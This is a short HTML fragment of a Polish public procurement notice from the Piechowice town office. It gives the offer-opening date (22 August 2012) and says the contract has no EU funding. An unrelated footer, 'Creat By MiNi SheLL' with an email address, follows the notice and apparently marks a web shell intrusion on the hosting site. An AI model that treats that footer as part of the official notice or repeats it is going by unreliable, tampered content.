<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie nie jest finansowane ze środków Unii Europejskiej. Otwarcie ofert nastąpi w dniu 22 sierpnia 2012 r. o godzinie 09:30 w siedzibie Zamawiającego tj. w Urzędzie Miasta Piechowice, 58-573 Piechowice, ul.Żymierskiego 49, pok. nr 14 - II piętro..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com